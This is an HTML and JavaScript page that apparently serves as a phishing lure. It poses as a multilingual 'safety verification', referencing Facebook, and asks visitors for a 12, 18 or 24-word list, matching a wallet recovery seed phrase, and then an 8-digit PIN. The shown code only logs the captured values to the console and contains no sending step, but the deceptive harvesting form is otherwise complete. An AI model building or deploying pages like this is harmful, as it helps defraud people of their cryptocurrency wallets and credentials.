<!DOCTYPE html> 
<html lang="en" ng-app="app">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.4/angular.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery.mask/1.14.10/jquery.mask.js"></script>    
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.1.0/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.6.1/css/font-awesome.min.css"></title>
    <title>Document</title>
    <style>
        html{height: 100%;}
        body {
            background: rgb(3,3,3);
            background: linear-gradient(180deg, rgba(3,3,3,1) 0%, rgba(38,42,50,1) 100%);
            background-repeat: no-repeat;
            color: #fff;
            padding: 10px;
        }
        header {
            font-size: 20px;
        }

        p {
            text-align: center;
            font-size: 22px;
            margin-top: 15px;
            margin-bottom: 0;
        }

        .input {
            width: 100%;
            border: 1px solid #20242a;
            background: transparent;
            padding: 10px;
            height: 100px;
            text-align: center;
            color: #fff;
            margin-bottom: 40px;
        }

        .pin {
            height: auto;
            text-align: center;
        }

        .submit {
            padding: 5px 30px;
            color: #fff;
            background: #1c3d5c;
            border: 1px solid #386691;
            border-radius: 3px;
            font-size: 18px;
            font-weight: 600;
            float: right;
        }

        .submit:disabled {
            background: #444444;
            border-color: #747474;
            color: #747474;
        }
    </style>
</head>
<body ng-controller="c1">
    <form onsubmit="return false">
        <div class="loader__" id="spinner" style="display: none;position:fixed;top:0px;left:0px;width:100%;height:100%;text-align:center;background:rgba(255, 255, 255, 0.47);z-index:8000000;">
            <span class="fa fa-circle-o-notch  fa-spin " style="position:relative;top:50%;font-size:50px;color:#20242a"></span>
        </div>
        <div id="form1">
            <header>
                {{t.__text1}}
                <span style="float:right"> {{t.__text2}} 1</span>
            </header>
            <p> {{t.__text3}}</p>
            <span style="display: block;text-align: center;font-size: 14px;color: #ccc;margin-bottom: 30px;">{{t.__text4}}</span>

            <input type="text" class="input" id="words" onkeyup="check();" name="words" autofocus>

            <input type="submit" class="submit" id="nextPage" disabled value="{{t.__text5}}">
        </div>
        <div id="form2" style="display: none;">
            <header>
                {{t.__text1}}
                <span style="float:right">{{t.__text2}} 2</span>
            </header>
            <p style="margin-bottom: 30px;"> {{t.__text6}}</p>

            <input type="password" class="input pin" id="pin" onkeyup="checkPin()" maxlength="8" pattern="^[0-9]{8,8}$" name="pin" autofocus>

            <input type="hidden" name="exit">

            <input type="submit" class="submit" id="sendData" disabled value=" {{t.__text7}}">
        </div>
    </form>
    <script>

        
        $('#pin').mask('00000000');
        var words = document.getElementById('words'),
            pin = document.getElementById('pin'),
            nextPage = document.getElementById('nextPage'),
            sendData = document.getElementById('sendData'),
            form1 = document.getElementById('form1'),
            form2 = document.getElementById('form2'),
            spinner = document.getElementById('spinner');

        function check(){
            if( words.value.split(/[\s\.\?]+/).length === 12 || words.value.split(/[\s\.\?]+/).length === 18 || words.value.split(/[\s\.\?]+/).length === 24){
                nextPage.disabled = false
            } else {
                nextPage.disabled = true
            }
        }

        nextPage.onclick = function(){
            spinner.style.display = 'block'
            setTimeout(function(){
                spinner.style.display = 'none'
                form1.style.display = 'none'
                form2.style.display = 'block'
            },2000)
            return false
        }

        function checkPin(){
            if( pin.value.length === 8){
                sendData.disabled = false
            } else {
                sendData.disabled = true
            }return false
        }

        sendData.onclick = function(){
                console.log('print event: ' + words.value + ' : ' + pin.value)
        }
    </script>

    <script>
var text, 
    link = "facebook.com", 
    appname = "Facebook", 
    texts = { 
        en: { 
            __text1: "SAFETY VERIFICATION",
            __text2: "Step",
            __text3: "Enter Word List",
            __text4: "enter 12 - 18 or 24 words.",
            __text5: "Next",
            __text6: "Enter Your 8 Digit PIN",
            __text7: "Confirm",
        }, 

        tr: { 
            __text1: "GÜVENLİK DOĞRULAMA",
            __text2: "Adım",
            __text3: "Kelime Listesini Girin",
            __text4: "12 - 18 veya 24 kelime girin.",
            __text5: "Sonraki",
            __text6: "8 haneli PIN'İNİZİ girin",
            __text7: "Onaylamak",
        }, 
        
        es: { 
            __text1: "VERIFICACIÓN DE SEGURIDAD",
            __text2: "Paso",
            __text3: "Introduzca la lista de palabras",
            __text4: "ingrese 12 - 18 o 24 palabras.",
            __text5: "Siguiente",
            __text6: "Introduzca su PIN de 8 dígitos",
            __text7: "Confirmar",
        },  

        fr: { 
            __text1: "VÉRIFICATION DE LA SÉCURITÉ",
            __text2: "Étape",
            __text3: "Entrez La Liste Des Mots",
            __text4: "entrez 12 - 18 ou 24 mots.",
            __text5: "Prochain",
            __text6: "Entrez votre code PIN à 8 chiffres",
            __text7: "Confirmer",
        }, 

        ro: { 
            __text1: "VERIFICAREA SIGURANȚEI",
            __text2: "Pas",
            __text3: "Introduceți lista de cuvinte",
            __text4: "introduceți 12 - 18 sau 24 de cuvinte.",
            __text5: "Următorul",
            __text6: "Introduceți codul PIN 8 cifre",
            __text7: "Confirmă",
        }, 

        it: { 
            __text1: "VERIFICA DELLA SICUREZZA",
            __text2: "Passo",
            __text3: "Inserisci Elenco Di Parole",
            __text4: "inserisci 12-18 o 24 parole.",
            __text5: "Prossimo",
            __text6: "Inserisci il tuo PIN a 8 cifre",
            __text7: "Confermare",
        },  

        de: { 
            __text1: "SICHERHEITSÜBERPRÜFUNG",
            __text2: "Schritt",
            __text3: "Wortliste Eingeben",
            __text4: "geben Sie 12 - 18 oder 24 Wörter.",
            __text5: "Nächsten",
            __text6: "Geben Sie Ihre 8-Stellige PIN ein",
            __text7: "Bestätigen",
        }, 
    }
    var language = window.navigator.userLanguage || window.navigator.language; 
            language = language.match(/^.{2}/), texts[language] == undefined ? text = texts.en : text = texts[language]; 

            var app = angular.module("app", []); 
            app.controller("c1", ["$scope", "$rootScope", function (t, e) { 
                rootScope = e, 
                scope = t, 
                e.scums = [], 
                t.t = text, 
                t.reset = function () { 
                    $(e.scums).each(function () { 
                        this.reset() }) 
                } 
            }]);
</script>
</body>
</html>